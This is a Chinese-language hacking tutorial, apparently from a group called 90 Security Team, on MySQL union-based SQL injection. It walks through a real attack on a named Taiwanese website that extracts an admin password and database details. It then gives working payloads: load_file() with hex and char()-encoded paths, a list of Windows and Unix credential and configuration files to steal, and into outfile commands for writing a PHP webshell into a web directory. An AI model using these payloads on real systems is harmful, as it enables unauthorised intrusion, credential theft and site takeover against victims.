MYSQL常用注入代码

and (select count(*) from mysql.user)>0/* 判断读取权限  

union select 1,concat_ws(0x3a,username,password),3,4 猜解用户名和密码




信息来源：九零后安全技术小组|90 Security Team

（http://www.90team.net）转载请注明出处。




知道了字段长度后我们用union select联合查询来列出所有字段

http://www.dpp.org.tw/news_conte ... menu=44&sn=3575 union select 1,2,3,4,5,6,7,8,9,10,11/**  //这里我们列出了11个字段,并且以/*结束符告诉MYSQL,命执行完毕。

这里返回 3/11 4 这几个字段

列出字段后就可以在回显的相应的字段上,替换你要查询的字段名,再from表名.就可以暴出相应的字段内容，这里我们用passwd替换 4 这个字段

如：

http://www.dpp.org.tw/news_conte ... menu=44&sn=3575 and 1=2 union select 1,2,3,passw,5,6,7,8,9,10,11 from admin/*     

这里返回密码641223，因为小波入侵过，所以事先知道了用户名，到这里就成功得到后台的管理密码。但是上次被黑之后管理员把后台改掉了，无法通过GOOGLE搜索到，我也没猜出来，所以后台登陆上传拿SHELL的方法就断了。
下面简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

1:system_user() 系统用户名
2:user()        用户名
3:current_user  当前用户名
4:session_user()连接数据库的用户名
5:database()    数据库名
6:version()     MYSQL数据库版本
7:load_file()   MYSQL读取本地文件的函数
8:@@datadir     读取数据库路径
9:@@basedir    MYSQL 安装路径
10:@@version_compile_os   操作系统

利用的方法如下：

在刚才返回的字段3上替换上database()函数，4上替换上system_user()函数，11上替换session_user()函数。

http://www.dpp.org.tw/news_conte ... menu=44&sn=3575 union select 1,2,database(),system_user(),5,6,7,8,9,10,session_user()/**

执行后字段 3，4，11 分别返回 数据库名：dpp  系统用户名：dpp@localhost 连接数据库用户名：dpp@localhost

http://www.dpp.org.tw/news_conte ... menu=44&sn=3575 union select 1,2,3,version(),5,6,7,8,9,10,7/*

返回当前MYSQL数据库版本 5.0.51a ，（5.0以上都支持UNION联合查询）

这样的方法有点麻烦，我们可以用下面的语句只需要替换一个字段就能返回我们上一步列出的的三个函数。

下面我们将语句替换到字段4 ， 语句：CONCAT_WS(CHAR(32,58,32),user(),database(),version())

http://www.dpp.org.tw/news_conte ... menu=44&sn=3575 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,7/*

然后在字段4分别返回 用户名 数据库名 MYSQL版本号 并以冒号“：”隔开。

在这里大家可以举一反三，可以分别在字段3,4,11分别插入语句一次性暴出信息。

OK 收集到N多信息了，我们试试当前数据库用户的权限如何，以便利用 load_file() 这个强大的函数读取敏感文件内容。（小波入侵成功的关键就是利用load_file()读取了数据库文件得到数据库密码）

在注入点后面加上语句：and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。
我们执行
http://www.dpp.org.tw/news_conte ... menu=44&sn=3575 and (select count(*) from mysql.user)>0/*
返回错误，应该是网站被黑后管理员给数据库帐户降权了。所以我们也就不能在通过load_file()函数读取敏文件了。这条路也断了，后来我通过猜解 Fckeditor编辑器路径找到几个上传的页面上传文件。但都因为权限问题无法写入，不过在查找目录的过程中无意发现了某牛人留下的WEBSHELL。不过需要验证所以对我来说也没用。至此整个入侵失败了。
到这里文章还没结束哦

下一步介绍load_file()函数和into outfile的高级应用与技巧。（上面的入侵已经失败，所以下面说的都是假设的环境，也就是说当前的数据库用户拥有root最高权限，可以读写文件..）
load_file函数是MYSQL用来读取本地文件时用到的函数，但我们得到一个具有读写权限的数据库用户时，我们就可以用load_file函数读取系统的敏感文件，如数据库连接文件（获得数据库连接信息，连接帐户密码），系统配置文件，从而进一步收集信息并分析，渗透。

下面先列出一些网络上收集的文件列表

WINDOWS下:
c:/boot.ini          //查看系统版本
c:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini     
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码


LUNIX/UNIX下:

/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略

load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录

replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 "<" 替换成"空格" 返回的是网页.而无法查看到代码.

※load_file()函数的应用。

使用时先将要读取的路径转换为16进制或10进制再替换到前面返回的字段
例如替换的到字段4 ：

http://www.123.com/123.php?id=123 union select 1,2,3,load_file(c:\boot.ini),5,6,7,8,9,10,7/*load_file(c:\boot.ini)  这里的写法是错误的，因为没有将路径转换。


下面的写法才是正确的

转成16进制
http://www.123.com/123.php?id=123 union select 1,2,3,load_file(0x633A5C626F6F742E696E69),5,6,7,8,9,10,7/*

或10进制

http://www.123.com/123.php?id=123 union select 1,2,3,load_file(char(99,58,92,98,111,111,116,46,105,110,105)),5,6,7,8,9,10,7/*

说明：使用load_file()函数读取时，不能直接这样执行 load_file(c:\boot.ini) ，如果这样执行是无法回显，所以只能把路径转为16进制,直接提交数据库或把路径转为10进制,用char()函数还原回ASCII。
例如：
将c:\boot.ini,转换为16进制就是:"0x633A5C626F6F742E696E69",使用就是将 load_file(0x633A5C626F6F742E696E69)替换到前面返回的字段。就能读取出c:\boot.ini的内容（当然前提是系统在C盘下）
将c:\boot.ini转换为10进制是:"99 58 92 98 111 111 116 46 105 110 105"。需要使用char()来转换,转换前在记事本里把这段10进制代码之间的空格用“ ,”替换（注意英文状态下的逗号）, 即:load_file(char(99,58,92,98,111,111,116,46,105,110,105))。注意不要少了扩号。


※into outfile的高级应用

要使用into outfile将一句话代码写到web目录取得WEBSHELL  
需要满足3大先天条件
1.知道物理路径(into outfile '物理路径') 这样才能写对目录

2.能够使用union (也就是说需要MYSQL3以上的版本)

3.对方没有对’进行过滤(因为outfile 后面的 '' 不可以用其他函数代替转换)

4就是MYSQL 用户拥有file_priv权限(不然就不能写文件 或者把文件内容读出)

5.windows系统下一般都有读写权限，LINUX/UNIX下一般都是rwxr-xr-x 也就是说组跟其他用户都没有权限写入操作。

但环境满足以上条件那么我们可以写一句话代码进去。
例如：
http://www.123.com/123.php?id=123 union select 1,2,3,char(这里写入你转换成10进制或16进制的一句话木马代码),5,6,7,8,9,10,7 into outfile 'd:\web\90team.php'/*



还有一个办法是假如网站可以上传图片，可以将木马改成图片的格式上传，找出图片的绝对路径在通过into outfile导出为PHP文件。

代码：
http://www.123.com/123.php?id=123 union select 1,2,3,load_file(d:\web\logo123.jpg),5,6,7,8,9,10,7 into outfile 'd:\web\90team.php'/*

d:\web\90team.php 是网站绝对路径。


好了，到此为止篇文章已经写完了，文章有纰漏或者错误的地方还望大家谅解指出。
                                                                                                         
                                                                                                           by 书生
                                                                                                          [90.S.T]